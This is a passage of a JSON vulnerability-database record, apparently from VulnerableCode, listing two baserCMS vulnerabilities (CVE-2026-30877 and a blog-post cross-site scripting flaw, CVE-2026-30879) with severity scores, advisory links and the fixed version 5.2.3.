baserCMS.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19949", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00063", "scoring_system": "epss", "scoring_elements": "0.19955", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30877" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-02T14:43:30Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-m9g7-rgfc-jcm7" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877", "reference_id": "", "reference_type": "", "scores": [ { "value": "9.1", "scoring_system": "cvssv3.1", "scoring_elements": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H" }, { "value": "CRITICAL", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30877" }, { "reference_url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7", "reference_id": "GHSA-m9g7-rgfc-jcm7", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-m9g7-rgfc-jcm7" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30877", "GHSA-m9g7-rgfc-jcm7" ], "risk_score": 4.5, "exploitability": "0.5", "weighted_severity": "9.0", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-y2sz-c6vb-pkdp" }, { "url": "http://public2.vulnerablecode.io/api/vulnerabilities/91645?format=api", "vulnerability_id": "VCID-zqd4-rdem-jfgk", "summary": "baserCMS has a cross-site scripting vulnerability in blog posts.\n\n### Target\nbaserCMS 5.2.1 and earlier versions\n\n### Vulnerability\n\nMalicious Javascript may be executed in blog posts.\n\n### Countermeasures\nUpdate to the latest version of baserCMS\n\nPlease refer to the following page to reference for more information.\nhttps://basercms.net/security/JVN_20837860\n\n### Credits\n\nGai Tanaka@Mitsui Bussan Secure Directions, Inc.", "references": [ { "reference_url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879", "reference_id": "", "reference_type": "", "scores": [ { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01622", "published_at": "2026-06-06T12:55:00Z" }, { "value": "0.00012", "scoring_system": "epss", "scoring_elements": "0.01615", "published_at": "2026-06-05T12:55:00Z" } ], "url": "https://api.first.org/data/v1/epss?cve=CVE-2026-30879" }, { "reference_url": "https://basercms.net/security/JVN_20837860", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://basercms.net/security/JVN_20837860" }, { "reference_url": "https://github.com/baserproject/basercms", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://github.com/baserproject/basercms" }, { "reference_url": "https://github.com/baserproject/basercms/releases/tag/5.2.3", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://github.com/baserproject/basercms/releases/tag/5.2.3" }, { "reference_url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" }, { "value": "Track", "scoring_system": "ssvc", "scoring_elements": "SSVCv2/E:N/A:Y/T:P/P:M/B:A/M:M/D:T/2026-03-31T14:00:24Z/" } ], "url": "https://github.com/baserproject/basercms/security/advisories/GHSA-jmq3-x8q7-j9qm" }, { "reference_url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879", "reference_id": "", "reference_type": "", "scores": [ { "value": "6.9", "scoring_system": "cvssv4", "scoring_elements": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N" }, { "value": "MODERATE", "scoring_system": "generic_textual", "scoring_elements": "" } ], "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-30879" }, { "reference_url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm", "reference_id": "GHSA-jmq3-x8q7-j9qm", "reference_type": "", "scores": [], "url": "https://github.com/advisories/GHSA-jmq3-x8q7-j9qm" } ], "fixed_packages": [ { "url": "http://public2.vulnerablecode.io/api/packages/112578?format=api", "purl": "pkg:composer/baserproject/basercms@5.2.3", "is_vulnerable": false, "affected_by_vulnerabilities": [], "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.2.3" } ], "aliases": [ "CVE-2026-30879", "GHSA-jmq3-x8q7-j9qm" ], "risk_score": 3.1, "exploitability": "0.5", "weighted_severity": "6.2", "resource_url": "http://public2.vulnerablecode.io/vulnerabilities/VCID-zqd4-rdem-jfgk" } ], "fixing_vulnerabilities": [], "risk_score": "4.5", "resource_url": "http://public2.vulnerablecode.io/packages/pkg:composer/baserproject/basercms@5.0.15" }